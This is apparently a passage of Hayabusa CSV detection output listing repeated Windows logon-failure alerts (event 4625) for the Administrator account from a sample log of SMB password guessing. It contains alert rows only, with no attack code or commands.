NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dp5dq3YYmmLxperL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: klkWqfYoNQQHRISX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0EekPO3q6qRfq3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfG1x6sL4Aqlj7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: owSUehMmDEhijkfl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3xBPT5WiuvmPZHe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIufEPz8FBVd5yKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Blruxd110NvZjof : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0VsPitzItsjU3Y59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HEq6vk4nTe3weSOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lE8kvmcQtCmlsqtT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXmfjxrGC3liZ2oh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72JLcUBrhOoXPLzD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sRoFpK2ZvBYy4jGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9KReiI3k2WIKpxFq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wsfSzPbji6ARhU0k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axeCxygvJ4zL4Xoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y64sc51Y7vbiFTIQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o395tRQcfRBTTCSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1R4wlYWS4SkM3dF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsZy0Yjvk720Mu22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c8RusStjhReKBmS0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eJuPYLTcGaGvErLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: raCbua01mzU1Djuf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fnt8atAbMtxXivUs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: psokvQJyMn5m5rMh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wTPGqOITsOhpTgIF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xxhGrLzhwNziihc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UIb1lHuPaC62UlBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2uvXuLIR9yvmWngF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MI35CCybjNtntfwo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0GTJfOkk0fUC5YCX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jk6PsiAiLPsHGUh1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KeGDMp9My5eLJz55 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BvDQphjvwOCsNQqB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJhad4aocvPMYVP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJl3XqTUxvqiKKaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1fAJDfguuoNxWiR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: daAeGcsqoqERsEu6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0iynnwxS8v4C5b3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2kU7IS4XCvgRpTff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MBC8AJXBQHrCMrO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NSGraDQmI4MAq9Ls : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7u2Pb9y8hB0iYWh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A657rbd6k4AD7M4i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7rkiDUBuTCU2jDXR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jjsCFTQoobrkQoWF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dNXav95nZyBhVOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yeq1x56Ct6R2Nu3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pUwyCNtwydEQu2bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bX7eihAOk3PUgbwM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WPXqAsaYaXEr8I9L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4SaEmIpmlH1VMDun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3Dvp43a2h7Mzx2H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g3voKlRXc7rIaIYs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GF1Q5OhCLRAi96mN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: caHe4iY2CQoiumQI : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJi6UAm6Pp6eax8Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EW0t2wapD8yniO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PnaITXTihpB0stwx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tdBVoa82WKEAW2ce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BelKzJrEjGIcU2dN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ujeb7fRHPGCGmFm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Czwt7KF2sQHemwdJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LQQ4nNpbfKKVCJZH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6jwIc6e0AHAhXKK5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nld9Job0Ll1Fgtmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9sS6i9iU3PXhokz : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: heaYv6Np8swhoVc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7rzgNBtUJkS93pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh45suNQ09FzPBjd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BOnwAGxxz994k6Ee : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L26mvUKOgGptcKaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
